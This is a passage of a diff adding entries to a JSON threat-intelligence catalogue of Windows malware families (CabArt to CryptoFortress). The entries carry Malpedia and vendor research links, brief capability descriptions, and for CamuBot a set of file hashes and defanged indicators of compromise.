"https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" + ] + }, + "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", + "value": "CabArt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Cadelle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" + ] + }, + "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", + "value": "CadelSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", + "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" + ] + }, + "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", + "value": "CamuBot", + "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", + "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" + ] + }, + "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", + "value": "Cannibal Rat", + "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable." 
+ }, + { + "meta": { + "synonyms": [ + "Anunak" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", + "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", + "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + ] + }, + "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", + "value": "Carbanak", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" + ] + }, + "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", + "value": "Carberp", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", + "value": "Cardinal RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", + "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" + ] + }, + "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", + "value": "Casper", + "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", + "value": "Catchamas", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", + "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", + "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", + "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", + "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", + "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", + "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", + "https://blog.avast.com/progress-on-ccleaner-investigation", + "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", + "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", + "https://twitter.com/craiu/status/910148928796061696", + "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", + "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", + "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", + "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" + ] + }, + "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", + "value": "CCleaner Backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cerebrus" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", + 
"https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" + ] + }, + "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", + "value": "CenterPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", + "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", + "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/", + "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html" + ] + }, + "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", + "value": "Cerber", + "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" + ] + }, + "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", + "value": "Cerbu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ham Backdoor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", + "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", + "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", + "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" + ] + }, + "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", + "value": "ChChes", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cherrypickerpos", + "cherrypicker", + "cherry_picker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" + ] + }, + "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", + "value": "CherryPicker POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", + "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" + ] + }, + "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", + "value": "ChewBacca", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" + ] + }, + "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", + "value": "Chinad", + "description": "Adware that shows 
advertisements using plugin techniques for popular browsers" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" + ] + }, + "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", + "value": "Chir", + "description": "" + }, + { + "meta": { + "synonyms": [ + "AndroKINS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", + "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", + "https://www.s21sec.com/en/blog/2017/07/androkins/", + "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" + ] + }, + "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", + "value": "Chthonic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", + "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", + "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", + "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", + "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" + ] + }, + "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", + "value": "Citadel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", + "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" + ] + }, + "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", + "value": "Client Maximus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", + "https://www.f-secure.com/weblog/archives/00002822.html" + ] + }, + "uuid": 
"40baac36-2fd0-49b3-b05b-1087d60f4f2c", + "value": "Cloud Duke", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", + "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" + ] + }, + "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", + "value": "CMSBrute", + "description": "" + }, + { + "meta": { + "synonyms": [ + "meciv" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", + "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", + "https://twitter.com/ClearskySec/status/963829930776723461", + "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties" + ] + }, + "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", + "value": "CMSTAR", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html" + ] + }, + "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", + "value": "Cobalt Strike", + "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. 
Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", + "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", + "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" + ] + }, + "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", + "value": "Cobian RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "COOLPANTS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", + "https://www.group-ib.com/blog/renaissance", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/" + ] + }, + "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", + "value": "CobInt", + "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager." 
+ }, + { + "meta": { + "synonyms": [ + "Carbon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", + "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", + "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/hfiref0x/TDL" + ] + }, + "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", + "value": "Cobra Carbon System", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", + "https://twitter.com/JaromirHorejsi/status/817311664391524352" + ] + }, + "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", + "value": "CockBlocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" + ] + }, + "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", + "value": "CodeKey", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", + "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" + ] + }, + "uuid": "9481d7b1-307c-4504-9333-21720b85317b", + "value": "Cohhoc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", + "https://secrary.com/ReversingMalware/CoinMiner/", + "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/" + ] + }, + "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", + 
"value": "Coinminer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bandios", + "GrayBird" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", + "https://twitter.com/anyrun_app/status/976385355384590337", + "https://secrary.com/ReversingMalware/Colony_Bandios/", + "https://pastebin.com/GtjBXDmz" + ] + }, + "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", + "value": "Colony", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" + ] + }, + "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", + "value": "Combojack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", + "value": "Combos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", + "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" + ] + }, + "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", + "value": "ComodoSec", + "description": "" + }, + { + "meta": { + "synonyms": [ + "lojack" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", + "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", + "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", + "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research", + "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/" + ] + }, + "uuid": 
"d24882f9-8645-4f6a-8a86-2f85daaad685", + "value": "Computrace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", + "https://twitter.com/struppigel/status/816926371867926528" + ] + }, + "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", + "value": "ComradeCircle", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + ] + }, + "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", + "value": "concealment_troy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "downadup", + "traffic converter" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", + "http://contagiodump.blogspot.com/2009/05/win32conficker.html" + ] + }, + "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", + "value": "Conficker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", + "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/" + ] + }, + "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", + "value": "Confucius", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", + "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" + ] + }, + "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", + "value": "Contopee", + "description": "" + }, + { + 
"meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", + "value": "CookieBag", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", + "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", + "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" + ] + }, + "uuid": "495377c4-1be5-4c65-ba66-94c221061415", + "value": "Corebot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "http://malware.prevenity.com/2014/08/malware-info.html", + "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html" + ] + }, + "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", + "value": "Coreshell", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", + "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" + ] + }, + "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", + "value": "CradleCore", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crash", + "Industroyer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", + "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", + 
"https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + ] + }, + "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", + "value": "CrashOverride", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" + ] + }, + "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", + "value": "Credraptor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" + ] + }, + "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", + "value": "Crenufs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", + "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" + ] + }, + "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", + "value": "Crimson", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" 
+ ] + }, + "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", + "value": "Crisis", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", + "https://hackmag.com/security/ransomware-russian-style/", + "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", + "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", + "https://twitter.com/demonslay335/status/971164798376468481" + ] + }, + "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", + "value": "Cryakl", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" + ] + }, + "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", + "value": "CryLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", + "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" + ] + }, + "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", + "value": "CrypMic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", + "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" + ] + }, + "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", + "value": "Crypt0l0cker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", + "https://www.secureworks.com/research/cryptolocker-ransomware", + 
"https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware" + ] + }, + "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", + "value": "CryptoLocker", + "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", + "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" + ] + }, + "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", + "value": "CryptoLuck", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CryptFile2" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", + "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", + "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/" + ] + }, + "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", + "value": "CryptoMix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", + "https://twitter.com/struppigel/status/810770490491043840" + ] + }, + "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", + "value": "Cryptorium", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", + "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", + 
"http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" + ] + }, + "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", + "value": "CryptoShield", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", + "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" + ] + }, + "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", + "value": "CryptoShuffler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" + ] + }, + "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", + "value": "Cryptowall", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", + "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" + ] + }, + "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", + "value": "CryptoWire", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", + "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", + "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", + "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" + ] + }, + "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", + "value": "CryptoFortress", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", + "https://twitter.com/JaromirHorejsi/status/818369717371027456" + ] + }, + "uuid": 